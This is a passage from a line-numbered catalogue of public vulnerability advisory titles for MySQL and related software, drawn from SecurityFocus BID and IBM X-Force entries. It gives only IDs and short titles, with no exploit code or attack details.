21180| [61210] Oracle MySQL Server CVE-2013-3783 Remote Security Vulnerability
21181| [60424] Debian mysql-server CVE-2013-2162 Insecure File Creation Vulnerability
21182| [60001] Wireshark MySQL Dissector Denial of Service Vulnerability
21183| [59242] Oracle MySQL CVE-2013-2391 Local MySQL Server Vulnerability
21184| [59239] Oracle MySQL CVE-2013-1502 Local MySQL Server Vulnerability
21185| [59237] Oracle MySQL CVE-2013-1506 Remote MySQL Server Vulnerability
21186| [59232] Oracle MySQL CVE-2013-1567 Remote MySQL Server Vulnerability
21187| [59229] Oracle MySQL Server CVE-2013-1544 Remote Security Vulnerability
21188| [59227] Oracle MySQL CVE-2013-2376 Remote MySQL Server Vulnerability
21189| [59225] Oracle MySQL CVE-2013-1523 Remote MySQL Server Vulnerability
21190| [59224] Oracle MySQL Server CVE-2013-2392 Remote Security Vulnerability
21191| [59223] Oracle MySQL Server CVE-2013-1548 Remote Security Vulnerability
21192| [59222] RETIRED: Oracle MySQL CVE-2012-5614 Remote MySQL Server Vulnerability
21193| [59218] Oracle MySQL Server CVE-2013-1512 Remote Security Vulnerability
21194| [59217] Oracle MySQL CVE-2013-1526 Remote MySQL Server Vulnerability
21195| [59216] Oracle MySQL CVE-2013-1570 Remote MySQL Server Vulnerability
21196| [59215] Oracle MySQL Server CVE-2013-2381 Remote Security Vulnerability
21197| [59211] Oracle MySQL Server CVE-2013-1532 Remote Security Vulnerability
21198| [59210] Oracle MySQL CVE-2013-1555 Remote MySQL Server Vulnerability
21199| [59209] Oracle MySQL CVE-2013-2375 Remote MySQL Server Vulnerability
21200| [59207] Oracle MySQL Server CVE-2013-2389 Remote Security Vulnerability
21201| [59205] Oracle MySQL Server CVE-2013-1566 Remote Security Vulnerability
21202| [59202] Oracle MySQL CVE-2013-1531 Remote MySQL Server Vulnerability
21203| [59201] Oracle MySQL Server CVE-2013-1511 Remote Security Vulnerability
21204| [59196] Oracle MySQL CVE-2013-1552 Remote MySQL Server Vulnerability
21205| [59188] Oracle MySQL CVE-2013-2378 Remote MySQL Server Vulnerability
21206| [59180] Oracle MySQL CVE-2013-1521 Remote MySQL Server Vulnerability
21207| [59173] Oracle MySQL CVE-2013-2395 Remote MySQL Server Vulnerability
21208| [58511] MySQL and MariaDB Geometry Query Denial Of Service Vulnerability
21209| [57418] Oracle MySQL Server CVE-2013-0386 Remote Security Vulnerability
21210| [57417] Oracle MySQL Server CVE-2013-0389 Remote Security Vulnerability
21211| [57416] Oracle MySQL Server CVE-2013-0384 Remote Security Vulnerability
21212| [57415] Oracle MySQL Server CVE-2013-0371 Remote Security Vulnerability
21213| [57414] Oracle MySQL Server CVE-2012-0574 Remote Security Vulnerability
21214| [57412] Oracle MySQL Server CVE-2013-0385 Local Security Vulnerability
21215| [57411] Oracle MySQL Server CVE-2012-5060 Remote Security Vulnerability
21216| [57410] Oracle MySQL Server CVE-2012-1705 Remote Security Vulnerability
21217| [57408] Oracle MySQL Server CVE-2013-0367 Remote Security Vulnerability
21218| [57405] Oracle MySQL Server CVE-2013-0383 Remote Security Vulnerability
21219| [57400] Oracle MySQL Server CVE-2012-5096 Remote Security Vulnerability
21220| [57397] Oracle MySQL Server CVE-2013-0368 Remote Security Vulnerability
21221| [57391] Oracle MySQL Server CVE-2013-0375 Remote Security Vulnerability
21222| [57388] Oracle MySQL Server CVE-2012-1702 Remote Security Vulnerability
21223| [57385] Oracle MySQL Server CVE-2012-0572 Remote Security Vulnerability
21224| [57334] Oracle MySQL Server CVE-2012-0578 Remote Security Vulnerability
21225| [56837] Oracle MySQL and MariaDB CVE-2012-5627 Insecure Salt Generation Security Bypass Weakness
21226| [56791] Oracle MySQL Remote Code Execution Vulnerability
21227| [56776] Oracle MySQL CVE-2012-5614 Denial of Service Vulnerability
21228| [56772] Oracle MySQL Remote Code Execution Vulnerability
21229| [56771] Oracle MySQL Server Privilege Escalation Vulnerability
21230| [56769] Oracle MySQL and MariaDB 'acl_get()' Buffer Overflow Vulnerability
21231| [56768] Oracle MySQL Server Heap Overflow Vulnerability
21232| [56766] Oracle MySQL Server Username Enumeration Weakness
21233| [56041] Oracle MySQL Server CVE-2012-3173 Remote MySQL Security Vulnerability
21234| [56036] Oracle MySQL Server CVE-2012-3163 Remote MySQL Security Vulnerability
21235| [56028] Oracle MySQL Server CVE-2012-3166 Remote Security Vulnerability
21236| [56027] Oracle MySQL Server CVE-2012-3160 Local Security Vulnerability
21237| [56022] Oracle MySQL Server CVE-2012-3147 Remote Security Vulnerability
21238| [56021] Oracle MySQL Server CVE-2012-3197 Remote Security Vulnerability
21239| [56018] Oracle MySQL Server CVE-2012-3167 Remote Security Vulnerability
21240| [56017] Oracle MySQL Server CVE-2012-3158 Remote Security Vulnerability
21241| [56013] Oracle MySQL Server CVE-2012-3156 Remote Security Vulnerability
21242| [56008] Oracle MySQL Server CVE-2012-3144 Remote Security Vulnerability
21243| [56006] Oracle MySQL Server CVE-2012-3149 Remote Security Vulnerability
21244| [56005] Oracle MySQL Server CVE-2012-3177 Remote Security Vulnerability
21245| [56003] Oracle MySQL Server CVE-2012-3180 Remote Security Vulnerability
21246| [55990] Oracle MySQL Server CVE-2012-3150 Remote Security Vulnerability
21247| [55715] MySQL MyISAM Table Symbolic Link CVE-2012-4452 Local Privilege Escalation Vulnerability
21248| [55120] Oracle MySQL CVE-2012-2749 Denial Of Service Vulnerability
21249| [54551] Oracle MySQL Server CVE-2012-0540 Remote Security Vulnerability
21250| [54549] Oracle MySQL Server CVE-2012-1735 Remote Security Vulnerability
21251| [54547] Oracle MySQL Server CVE-2012-1689 Remote Security Vulnerability
21252| [54540] Oracle MySQL Server CVE-2012-1734 Remote Security Vulnerability
21253| [54526] Oracle MySQL Server CVE-2012-1757 Remote Security Vulnerability
21254| [54524] Oracle MySQL Server CVE-2012-1756 Remote Security Vulnerability
21255| [53922] RETIRED: MySQL and MariaDB 'sql/password.c' Authentication Bypass Vulnerability
21256| [53911] Oracle MySQL CVE-2012-2122 User Login Security Bypass Vulnerability
21257| [53310] MySQLDumper 'menu.php' Remote PHP Code Execution Vulnerability
21258| [53306] MySQLDumper Multiple Security Vulnerabilities
21259| [53074] Oracle MySQL CVE-2012-1690 Remote MySQL Server Vulnerability
21260| [53071] Oracle MySQL CVE-2012-1696 Remote MySQL Server Vulnerability
21261| [53067] Oracle MySQL CVE-2012-1688 Remote MySQL Server Vulnerability
21262| [53064] Oracle MySQL CVE-2012-1697 Remote MySQL Server Vulnerability
21263| [53061] Oracle MySQL CVE-2012-0583 Remote MySQL Server Vulnerability
21264| [53058] Oracle MySQL CVE-2012-1703 Remote MySQL Server Vulnerability
21265| [52931] Oracle MySQL Server Multiple Unspecified Security Vulnerabilities
21266| [52154] RETIRED: MySQL 5.5.20 Unspecified Remote Code Execution Vulnerability
21267| [51925] MySQL Unspecified Remote Code Execution Vulnerability
21268| [51526] Oracle MySQL CVE-2012-0075 Remote MySQL Server Vulnerability
21269| [51525] Oracle MySQL CVE-2012-0493 Remote Vulnerability
21270| [51524] Oracle MySQL Server CVE-2012-0490 Remote Security Vulnerability
21271| [51523] Oracle MySQL Server CVE-2012-0494 Local Security Vulnerability
21272| [51522] Oracle MySQL Server CVE-2012-0495 Remote Security Vulnerability
21273| [51521] Oracle MySQL Server CVE-2012-0117 Remote MySQL Server Vulnerability
21274| [51520] Oracle MySQL Server CVE-2012-0114 Local Security Vulnerability
21275| [51519] Oracle MySQL Server CVE-2012-0112 Remote MySQL Server Vulnerability
21276| [51518] Oracle MySQL Server CVE-2012-0491 Remote Security Vulnerability
21277| [51517] Oracle MySQL CVE-2012-0120 Remote Vulnerability
21278| [51516] Oracle MySQL Server CVE-2012-0492 Remote MySQL Server Vulnerability
21279| [51515] Oracle MySQL Server CVE-2012-0484 Remote Security Vulnerability
21280| [51514] Oracle MySQL Server CVE-2012-0486 Remote Security Vulnerability
21281| [51513] Oracle MySQL Server CVE-2012-0485 Remote Security Vulnerability
21282| [51512] Oracle MySQL CVE-2012-0119 Remote Vulnerability
21283| [51511] Oracle MySQL CVE-2012-0118 Remote MySQL Server Vulnerability
21284| [51510] Oracle MySQL Server CVE-2012-0489 Remote MySQL Server Vulnerability
21285| [51509] Oracle MySQL Server CVE-2012-0087 Remote Security Vulnerability
21286| [51508] Oracle MySQL CVE-2012-0116 Remote MySQL Server Vulnerability
21287| [51507] Oracle MySQL Server CVE-2012-0496 Remote Security Vulnerability
21288| [51506] Oracle MySQL Server CVE-2012-0488 Remote MySQL Server Vulnerability
21289| [51505] Oracle MySQL Server CVE-2012-0101 Remote Security Vulnerability
21290| [51504] Oracle MySQL CVE-2012-0115 Remote Vulnerability
21291| [51503] Oracle MySQL Server CVE-2012-0487 Remote MySQL Server Vulnerability
21292| [51502] Oracle MySQL Server CVE-2012-0102 Remote Security Vulnerability
21293| [51493] Oracle MySQL CVE-2011-2262 Remote MySQL Server Vulnerability
21294| [51488] Oracle MySQL CVE-2012-0113 Remote MySQL Server Vulnerability
21295| [50139] DBD::mysqlPP Unspecified SQL Injection Vulnerability
21296| [48466] MySQLDriverCS SQL Injection Vulnerability
21297| [47919] Zend Framework 'PDO_MySql' Security Bypass Vulnerability
21298| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
21299| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
21300| [46655] pywebdav MySQL Authentication Module SQL Injection Vulnerability
21301| [46456] MySQL Eventum 'full_name' Field HTML Injection Vulnerability
21302| [46380] MySQL Eventum Multiple HTML Injection Vulnerabilities
21303| [46056] PHP MySQLi Extension 'set_magic_quotes_runtime' Function Security-Bypass Weakness
21304| [43884] phpFK - PHP Forum Script ohne MySQL 'page_bottom.php' Local File Include Vulnerability
21305| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
21306| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
21307| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
21308| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
21309| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
21310| [42633] Oracle MySQL 'HANDLER' interface Denial Of Service Vulnerability
21311| [42625] Oracle MySQL 'LOAD DATA INFILE' Denial Of Service Vulnerability
21312| [42599] Oracle MySQL 'EXPLAIN' Denial Of Service Vulnerability
21313| [42598] Oracle MySQL 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability
21314| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
21315| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
21316| [42417] Zmanda Recovery Manager for MySQL Multiple Local Privilege Escalation Vulnerabilities
21317| [41440] phpFK - PHP Forum Script ohne MySQL 'upload.php' Arbitrary File Upload Vulnerability
21318| [41198] Oracle MySQL 'ALTER DATABASE' Remote Denial Of Service Vulnerability
21319| [40537] MySQL Enterprise Monitor Multiple Unspecified Cross Site Request Forgery Vulnerabilities
21320| [40506] RETIRED: phpGraphy 'mysql_cleanup.php' Remote File Include Vulnerability
21321| [40461] PHP Mysqlnd Extension Information Disclosure and Multiple Buffer Overflow Vulnerabilities
21322| [40257] Oracle MySQL DROP TABLE MyISAM Symbolic Link Local Security Bypass Vulnerability
21323| [40109] Oracle MySQL 'COM_FIELD_LIST' Command Packet Security Bypass Vulnerability
21324| [40106] Oracle MySQL 'COM_FIELD_LIST' Command Buffer Overflow Vulnerability
21325| [40100] Oracle MySQL Malformed Packet Handling Remote Denial of Service Vulnerability
21326| [40045] Advanced Poll 'mysql_host' Parameter Cross Site Scripting Vulnerability
21327| [39918] FlexAppsStore Flex MySQL Connector Unauthorized Access Vulnerability
21328| [39543] MySQL UNINSTALL PLUGIN Security Bypass Vulnerability
21329| [38642] Timeclock Software 'mysqldump' Local Information Disclosure Vulnerability
21330| [38043] MySQL 'sql/sql_table.cc' CREATE TABLE Security Bypass Vulnerability
21331| [37943] MySQL with yaSSL SSL Certificate Handling Remote Stack Buffer Overflow Vulnerability
21332| [37770] TYPO3 kiddog_mysqldumper Unspecified Information Disclosure Vulnerability
21333| [37640] MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability
21334| [37297] MySQL Multiple Remote Denial Of Service Vulnerabilities
21335| [37076] MySQL OpenSSL Server Certificate yaSSL Security Bypass Vulnerability
21336| [37075] MySQL MyISAM Table Symbolic Link Local Privilege Escalation Vulnerability
21337| [36242] MySQL 5.x Unspecified Buffer Overflow Vulnerability
21338| [35858] MySQL Connector/J Unicode Character String SQL Injection Vulnerability
21339| [35609] MySQL 'sql_parse.cc' Multiple Format String Vulnerabilities
21340| [35514] MySQL Connector/Net SSL Certificate Validation Security Bypass Vulnerability
21341| [33972] MySQL XPath Expression Remote Denial Of Service Vulnerability
21342| [33392] 'mod_auth_mysql' Package Multibyte Character Encoding SQL Injection Vulnerability
21343| [32978] MySQL Calendar 'username' Parameter SQL Injection Vulnerability
21344| [32914] MySQL Calendar Cookie Authentication Bypass Vulnerability
21345| [32157] MySQL Quick Admin 'actions.php' Local File Include Vulnerability
21346| [32000] Agora 'MysqlfinderAdmin.php' Remote File Include Vulnerability
21347| [31517] MySQL Quick Admin 'index.php' Local File Include Vulnerability
21348| [31486] MySQL Command Line Client HTML Special Characters HTML Injection Vulnerability
21349| [31425] PromoteWeb MySQL 'go.php' SQL Injection Vulnerability
21350| [31081] MySQL Empty Binary String Literal Remote Denial Of Service Vulnerability
21351| [30835] mysql-lists Unspecified Cross Site Scripting Vulnerability
21352| [30529] Keld PHP-MySQL News Script 'login.php' SQL Injection Vulnerability
21353| [30383] phpwebnews-mysql Multiple SQL Injection Vulnerabilities
21354| [29106] MySQL MyISAM Table Privileges Secuity Bypass Vulnerability
21355| [29048] GEDCOM_to_MySQL2 Multiple Cross-Site Scripting Vulnerabilities
21356| [28351] MySQL INFORMATION_SCHEMA Remote Denial Of Service Vulnerability
21357| [27938] DSPAM Debian 'libdspam7-drv-mysql' Cron Job MySQL Calls Local Information Disclosure Vulnerability
21358| [27202] PHP Webquest MySQL Credentials Information Disclosure Vulnerability
21359| [27032] PHP MySQL Open Source Help Desk 'form.php' Code Injection Vulnerability
21360| [26947] MySQL Server Unspecified Remote Arbitrary Command Execution Vulnerability
21361| [26832] MySQL Server Privilege Escalation And Denial Of Service Vulnerabilities
21362| [26829] aurora framework Db_mysql.LIB SQL Injection Vulnerability
21363| [26765] MySQL Server RENAME TABLE System Table Overwrite Vulnerability
21364| [26353] MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
21365| [26304] AdventNet EventLog Analyzer Insecure Default MySQL Password Unauthorized Access Vulnerability
21366| [26156] Bacula MySQL Password Information Disclosure Vulnerability
21367| [26095] Asterisk 'asterisk-addons' CDR_ADDON_MYSQL Module SQL Injection Vulnerability
21368| [25017] MySQL Access Validation and Denial of Service Vulnerabilities
21369| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
21370| [24016] MySQL Rename Table Function Access Validation Vulnerability
21371| [24011] MySQL Security Invoker Privilege Escalation Vulnerability
21372| [24008] MySQL Alter Table Function Information Disclosure Vulnerability
21373| [23911] MySQL IF Query Handling Remote Denial Of Service Vulnerability
21374| [23176] Eve-Nuke Forums MySQL.PHP Remote File Include Vulnerability
21375| [22941] MySQL Commander Remote File Include Vulnerability
21376| [22900] MySQL Single Row SubSelect Remote Denial Of Service Vulnerability
21377| [22474] CPanel PassWDMySQL Cross-Site Scripting Vulnerability
21378| [22431] MySQLNewsEngine Affichearticles.PHP3 Remote File Include Vulnerability
21379| [20460] MySQLDumper SQL.PHP Cross-Site Scripting Vulnerability
21380| [20222] PABugs Class.MySQL.PHP Remote File Include Vulnerability
21381| [20165] ZoomStats MySQL.PHP Remote File Include Vulnerability
21382| [19794] MySQL Multiupdate and Subselects Denial Of Service Vulnerability
21383| [19559] MySQL Privilege Elevation and Security Bypass Vulnerabilities
21384| [19279] MySQL MERGE Privilege Revoke Bypass Vulnerability
21385| [19240] Banex PHP MySQL Banner Exchange Multiple Remote Vulnerabilities
21386| [19032] MySQL Server Date_Format Denial Of Service Vulnerability
21387| [18717] PHP/MySQL Classifieds AddAsset1.PHP Multiple HTML Injection Vulnerabilities
21388| [18439] MySQL Server Str_To_Date Remote Denial Of Service Vulnerability
21389| [18219] MySQL Mysql_real_escape Function SQL Injection Vulnerability
21390| [17780] MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities
21391| [17224] Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability
21392| [17223] Cholod MySQL Based Message Board Multiple HTML Injection Vulnerabilities
21393| [17147] Woltlab Burning Board Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability
21394| [16850] MySQL Query Logging Bypass Vulnerability
21395| [16620] PHP/MYSQL Timesheet Multiple SQL Injection Vulnerabilities
21396| [16564] PAM-MySQL Code Execution And Denial Of Service Vulnerabilities
21397| [16219] PHP MySQLI Error Logging Remote Format String Vulnerability
21398| [16145] PHP MySQL_Connect Remote Buffer Overflow Vulnerability
21399| [15852] MySQL Auction Search Module Cross-Site Scripting Vulnerability
21400| [14509] MySQL User-Defined Function Buffer Overflow Vulnerability
21401| [14437] MySQL Eventum Multiple SQL Injection Vulnerabilities
21402| [14436] MySQL Eventum Multiple Cross-Site Scripting Vulnerabilities
21403| [13913] xMySQLadmin Insecure Temporary File Creation Vulnerability
21404| [13660] MySQL mysql_install_db Insecure Temporary File Creation Vulnerability
21405| [13378] MySQL MaxDB WebDAV IF Parameter Remote Buffer Overflow Vulnerability
21406| [13369] MySQL MaxDB WebDAV Lock Token Remote Buffer Overflow Vulnerability
21407| [13368] MySQL MaxDB HTTP GET Request Remote Buffer Overflow Vulnerability
21408| [12805] MySQL MaxDB WebAgent Input Validation Multiple Remote Denial Of Service Vulnerabilities
21409| [12781] MySQL AB MySQL Multiple Remote Vulnerabilities
21410| [12313] MySQL MaxDB WebAgent Remote Denial of Service Vulnerabilities
21411| [12277] MySQL Database MySQLAccess Local Insecure Temporary File Creation Vulnerability
21412| [12265] MySQL MaxDB WebAgent WebSQL Password Parameter Remote Buffer Overflow Vulnerability
21413| [12133] MySQL Eventum Multiple Input Validation Vulnerabilities
21414| [11844] MySQL MaxDB WebDav Handler Overwrite Header Remote Buffer Overflow Vulnerability
21415| [11843] MySQL MaxDB WAHTTP Server Remote Denial Of Service Vulnerability
21416| [11435] MySQL Database Unauthorized GRANT Privilege Vulnerability
21417| [11432] MySQL Remote FULLTEXT Search Denial Of Service Vulnerability
21418| [11357] MySQL Multiple Local Vulnerabilities
21419| [11346] MySQL MaxDB WebDBM Server Name Denial of Service Vulnerability
21420| [11291] MySQL Unspecified Insecure Temporary File Creation Vulnerability
21421| [11261] MySQL Bounded Parameter Statement Execution Remote Buffer Overflow Vulnerability
21422| [11234] AllWebScripts MySQLGuest HTML Injection Vulnerability
21423| [10986] Ben Yacoub Hatem MySQL Backup Pro Undisclosed 'getbackup()' Vulnerability
21424| [10981] MySQL Mysql_real_connect Function Potential Remote Buffer Overflow Vulnerability
21425| [10969] MySQL Mysqlhotcopy Script Insecure Temporary File Creation Vulnerability
21426| [10655] MySQL Password Length Remote Buffer Overflow Vulnerability
21427| [10654] MySQL Authentication Bypass Vulnerability
21428| [10142] MySQL MYSQLD_Multi Insecure Temporary File Creation Vulnerability
21429| [9976] MySQL Aborted Bug Report Insecure Temporary File Creation Vulnerability
21430| [8796] MySQL Multiple Vulnerabilities
21431| [8590] MySQL Password Handler Buffer Overflow Vulnerability
21432| [8245] MySQL AB ODBC Driver Plain Text Password Vulnerability
21433| [7887] MySQL libmysqlclient Library mysql_real_connect() Buffer Overrun Vulnerability
21434| [7500] MySQL Weak Password Encryption Vulnerability
21435| [7052] MySQL mysqld Privilege Escalation Vulnerability
21436| [7041] MySQL Control Center Insecure Default File Permission Vulnerability
21437| [6718] MySQL Double Free Heap Corruption Vulnerability
21438| [6375] MySQL COM_CHANGE_USER Password Memory Corruption Vulnerability
21439| [6374] MySQL libmysqlclient Library Read_One_Row Buffer Overflow Vulnerability
21440| [6373] MySQL COM_CHANGE_USER Password Length Account Compromise Vulnerability
21441| [6370] MySQL libmysqlclient Library Read_Rows Buffer Overflow Vulnerability
21442| [6368] MySQL COM_TABLE_DUMP Memory Corruption Vulnerability
21443| [5948] PHPRank MySQL Error Unauthorized Access Vulnerability
21444| [5853] MySQL DataDir Parameter Local Buffer Overflow Vulnerability
21445| [5513] MySQL Logging Not Enabled Weak Default Configuration Vulnerability
21446| [5511] MySQL Bind Address Not Enabled Weak Default Configuration Vulnerability
21447| [5503] MySQL Null Root Password Weak Default Configuration Vulnerability
21448| [4409] Cyrus SASL LDAP+MySQL Authentication Patch SQL Command Execution Vulnerability
21449| [4026] PHP MySQL Safe_Mode Filesystem Circumvention Vulnerability
21450| [3907] Conectiva Linux MySQL World Readable Log File Vulnerability
21451| [3381] WinMySQLadmin Plain Text Password Storage Vulnerability
21452| [3284] Inter7 vpopmail MySQL Authentication Data Recovery Vulnerability
21453| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
21454| [2522] MySQL Root Operation Symbolic Link File Overwriting Vulnerability
21455| [2380] MySQL SHOW GRANTS Pasword Hash Disclosure Vulnerability
21456| [2262] Mysql Local Buffer Overflow Vulnerability
21457| [1850] pam_mysql Authentication Input Validation Vulnerability
21458| [1826] MySQL Authentication Algorithm Vulnerability
21459| [1557] PCCS Mysql Database Admin Tool Username/Password Exposure Vulnerability
21460| [975] MySQL Unauthenticated Remote Access Vulnerability
21461| [926] MySQL GRANT Global Password Changing Vulnerability
21462|
21463| IBM X-Force - https://exchange.xforce.ibmcloud.com:
21464| [85724] Oracle MySQL Server XA Transactions denial of service
21465| [85723] Oracle MySQL Server Server Replication denial of service
21466| [85722] Oracle MySQL Server InnoDB denial of service
21467| [85721] Oracle MySQL Server Server Privileges unspecified
21468| [85720] Oracle MySQL Server Server Partition denial of service
21469| [85719] Oracle MySQL Server Server Parser denial of service
21470| [85718] Oracle MySQL Server Server Options denial of service
21471| [85717] Oracle MySQL Server Server Options denial of service
21472| [85716] Oracle MySQL Server Server Optimizer denial of service
21473| [85715] Oracle MySQL Server Server Optimizer denial of service
21474| [85714] Oracle MySQL Server Prepared Statements denial of service
21475| [85713] Oracle MySQL Server InnoDB denial of service
21476| [85712] Oracle MySQL Server Full Text Search denial of service
21477| [85711] Oracle MySQL Server Data Manipulation Language denial of service
21478| [85710] Oracle MySQL Server Data Manipulation Language denial of service
21479| [85709] Oracle MySQL Server Audit Log unspecified
21480| [85708] Oracle MySQL Server MemCached unspecified
21481| [84846] Debian mysql-server package information disclosure
21482| [84375] Wireshark MySQL dissector denial of service
21483| [83554] Oracle MySQL Server Server Partition denial of service
21484| [83553] Oracle MySQL Server Server Locking denial of service
21485| [83552] Oracle MySQL Server Server Install unspecified
21486| [83551] Oracle MySQL Server Server Types denial of service
21487| [83550] Oracle MySQL Server Server Privileges unspecified
21488| [83549] Oracle MySQL Server InnoDB denial of service
21489| [83548] Oracle MySQL Server InnoDB denial of service
21490| [83547] Oracle MySQL Server Data Manipulation Language denial of service
21491| [83546] Oracle MySQL Server Stored Procedure denial of service
21492| [83545] Oracle MySQL Server Server Replication denial of service
21493| [83544] Oracle MySQL Server Server Partition denial of service
21494| [83543] Oracle MySQL Server Server Optimizer denial of service
21495| [83542] Oracle MySQL Server InnoDB denial of service
21496| [83541] Oracle MySQL Server Information Schema denial of service
21497| [83540] Oracle MySQL Server Data Manipulation Language denial of service
21498| [83539] Oracle MySQL Server Data Manipulation Language denial of service
21499| [83538] Oracle MySQL Server Server Optimizer unspecified
21500| [83537] Oracle MySQL Server MemCached denial of service
21501| [83536] Oracle MySQL Server Server Privileges unspecified
21502| [83535] Oracle MySQL Server Server Privileges unspecified
21503| [83534] Oracle MySQL Server Server unspecified
21504| [83533] Oracle MySQL Server Information Schema unspecified
21505| [83532] Oracle MySQL Server Server Locking unspecified
21506| [83531] Oracle MySQL Server Data Manipulation Language denial of service
21507| [83388] MySQL administrative login attempt detected
21508| [82963] Mambo MySQL database information disclosure
21509| [82946] Oracle MySQL buffer overflow
21510| [82945] Oracle MySQL buffer overflow
21511| [82895] Oracle MySQL and MariaDB geometry queries denial of service
21512| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
21513| [81325] Oracle MySQL Server Server Privileges denial of service
21514| [81324] Oracle MySQL Server Server Partition denial of service
21515| [81323] Oracle MySQL Server Server Optimizer denial of service
21516| [81322] Oracle MySQL Server Server Optimizer denial of service
21517| [81321] Oracle MySQL Server Server denial of service
21518| [81320] Oracle MySQL Server MyISAM denial of service
21519| [81319] Oracle MySQL Server InnoDB denial of service
21520| [81318] Oracle MySQL Server InnoDB denial of service
21521| [81317] Oracle MySQL Server Server Locking denial of service
21522| [81316] Oracle MySQL Server Server denial of service
21523| [81315] Oracle MySQL Server Server Replication unspecified
21524| [81314] Oracle MySQL Server Server Replication unspecified
21525| [81313] Oracle MySQL Server Stored Procedure denial of service
21526| [81312] Oracle MySQL Server Server Optimizer denial of service
21527| [81311] Oracle MySQL Server Information Schema denial of service
21528| [81310] Oracle MySQL Server GIS Extension denial of service
21529| [80790] Oracle MySQL yaSSL buffer overflow
21530| [80553] Oracle MySQL and MariaDB salt security bypass
21531| [80443] Oracle MySQL Server unspecified code execution
21532| [80442] Oracle MySQL Server acl_get() buffer overflow
21533| [80440] Oracle MySQL Server table buffer overflow
21534| [80435] Oracle MySQL Server database privilege escalation
21535| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
21536| [80433] Oracle MySQL Server Stuxnet privilege escalation
21537| [80432] Oracle MySQL Server authentication information disclosure
21538| [79394] Oracle MySQL Server Server Installation information disclosure
21539| [79393] Oracle MySQL Server Server Replication denial of service
21540| [79392] Oracle MySQL Server Server Full Text Search denial of service
21541| [79391] Oracle MySQL Server Server denial of service
21542| [79390] Oracle MySQL Server Client information disclosure
21543| [79389] Oracle MySQL Server Server Optimizer denial of service
21544| [79388] Oracle MySQL Server Server Optimizer denial of service
21545| [79387] Oracle MySQL Server Server denial of service
21546| [79386] Oracle MySQL Server InnoDB Plugin denial of service
21547| [79385] Oracle MySQL Server InnoDB denial of service
21548| [79384] Oracle MySQL Server Client unspecified
21549| [79383] Oracle MySQL Server Server denial of service
21550| [79382] Oracle MySQL Server Protocol unspecified
21551| [79381] Oracle MySQL Server Information Schema unspecified
21552| [78954] SilverStripe MySQLDatabase.php information disclosure
21553| [78948] MySQL MyISAM table symlink
21554| [77865] MySQL unknown vuln
21555| [77864] MySQL sort order denial of service
21556| [77768] MySQLDumper refresh_dblist.php information disclosure
21557| [77177] MySQL Squid Access Report unspecified cross-site scripting
21558| [77065] Oracle MySQL Server Optimizer denial of service
21559| [77064] Oracle MySQL Server Optimizer denial of service
21560| [77063] Oracle MySQL Server denial of service
21561| [77062] Oracle MySQL InnoDB denial of service
21562| [77061] Oracle MySQL GIS Extension denial of service
21563| [77060] Oracle MySQL Server Optimizer denial of service
21564| [76189] MySQL unspecified error
21565| [76188] MySQL attempts security bypass
21566| [75287] MySQLDumper restore.php information disclosure
21567| [75286] MySQLDumper filemanagement.php directory traversal
21568| [75285] MySQLDumper main.php cross-site request forgery
21569| [75284] MySQLDumper install.php cross-site scripting
21570| [75283] MySQLDumper install.php file include
21571| [75282] MySQLDumper menu.php code execution
21572| [75022] Oracle MySQL Server Server Optimizer denial of service
21573| [75021] Oracle MySQL Server Server Optimizer denial of service
21574| [75020] Oracle MySQL Server Server DML denial of service
21575| [75019] Oracle MySQL Server Partition denial of service
21576| [75018] Oracle MySQL Server MyISAM denial of service
21577| [75017] Oracle MySQL Server Server Optimizer denial of service
21578| [74672] Oracle MySQL Server multiple unspecified
21579| [73092] MySQL unspecified code execution
21580| [72540] Oracle MySQL Server denial of service
21581| [72539] Oracle MySQL Server unspecified
21582| [72538] Oracle MySQL Server denial of service
21583| [72537] Oracle MySQL Server denial of service
21584| [72536] Oracle MySQL Server unspecified
21585| [72535] Oracle MySQL Server denial of service
21586| [72534] Oracle MySQL Server denial of service
21587| [72533] Oracle MySQL Server denial of service
21588| [72532] Oracle MySQL Server denial of service
21589| [72531] Oracle MySQL Server denial of service
21590| [72530] Oracle MySQL Server denial of service
21591| [72529] Oracle MySQL Server denial of service
21592| [72528] Oracle MySQL Server denial of service
21593| [72527] Oracle MySQL Server denial of service
21594| [72526] Oracle MySQL Server denial of service
21595| [72525] Oracle MySQL Server information disclosure
21596| [72524] Oracle MySQL Server denial of service
21597| [72523] Oracle MySQL Server denial of service
21598| [72522] Oracle MySQL Server denial of service
21599| [72521] Oracle MySQL Server denial of service
21600| [72520] Oracle MySQL Server denial of service
21601| [72519] Oracle MySQL Server denial of service
21602| [72518] Oracle MySQL Server unspecified
21603| [72517] Oracle MySQL Server unspecified
21604| [72516] Oracle MySQL Server unspecified
21605| [72515] Oracle MySQL Server denial of service
21606| [72514] Oracle MySQL Server unspecified
21607| [71965] MySQL port denial of service
21608| [70680] DBD::mysqlPP unspecified SQL injection
21609| [70370] TaskFreak! multi-mysql unspecified path disclosure
21610| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
21611| [68294] MySQLDriverCS statement.cs sql injection
21612| [68175] Prosody MySQL denial of service
21613| [67539] Zend Framework MySQL PDO security bypass
21614| [67254] DirectAdmin MySQL information disclosure
21615| [66567] Xoops mysql.sql information disclosure
21616| [65871] PyWebDAV MySQLAuthHandler class SQL injection
